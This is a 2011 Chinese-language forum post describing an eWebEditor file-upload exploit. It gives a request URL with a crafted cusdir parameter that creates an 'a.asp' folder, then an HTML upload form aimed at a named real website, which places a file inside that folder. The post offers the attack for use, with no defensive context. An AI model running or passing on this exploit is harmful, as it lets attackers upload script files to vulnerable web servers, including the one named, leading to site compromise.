云美公社

云美公社»首页 › IT技术/使用交流 › 电脑病毒论坛 › ewebeditor通杀鸡肋0day漏洞

返回列表發新帖

查看: 102|回覆: 0

[漏洞分析] ewebeditor通杀鸡肋0day漏洞

4 主題	0 回帖	0 積分

金币: 0
閲讀權限: 220
精華: 0
威望: 0
贡献: 0
在線時間: 0 小時
註冊時間: 2011-2-20

發消息

發表於 2011-3-11 11:59:01 | 顯示全部樓層 |閲讀模式

先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。

<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

回覆

使用道具舉報

返回列表發新帖

Archiver|手机版|小黑屋|云美公社 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等，请发 E-mail：qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部